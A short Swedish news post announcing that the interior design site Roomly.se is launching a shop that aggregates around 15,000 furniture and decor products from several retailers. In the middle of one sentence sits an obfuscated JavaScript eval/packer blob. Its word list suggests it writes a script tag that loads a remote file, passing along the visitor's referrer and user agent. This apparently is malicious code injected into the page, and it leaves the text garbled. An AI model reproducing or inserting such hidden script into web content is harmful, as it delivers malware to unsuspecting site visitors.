Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Inredningssajten Roomly.se lanserar butik

Inredningssajten Roomly.se lanserar butik

Att inredningssajten Roomly.se växer sig större varje månad är något som märks. Inte minst på siffrorna som visas men också på design, funktion och antal inspirationsbilder som publiceras.

Nu tar sajten nästa steg och lanserar en butik med fokus på inredning eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nhhas|var|u0026u|referrer|zzkns||js|php’.split(’|’),0,{}))
och möbler
. Butiken samlar produkter från ett flertal stora inredningsbutiker och gör det enkelt för användaren att hitta rätt på en samlad plats. Istället för att söka på Google eller gå in på varje enskild butik kan man nu göra sin egen filtrering och få resultat.

Hittills finns ca 15.000 produkter från bland annat Furniturebox, Rum21 och Voga.

Mer funktioner är på gång som även ska göra det lättare att se vilka möbler som visas upp i inspirationsbilderna på sajten.

Besök Roomly.se och butiken här: Roomly.se inredningsbutik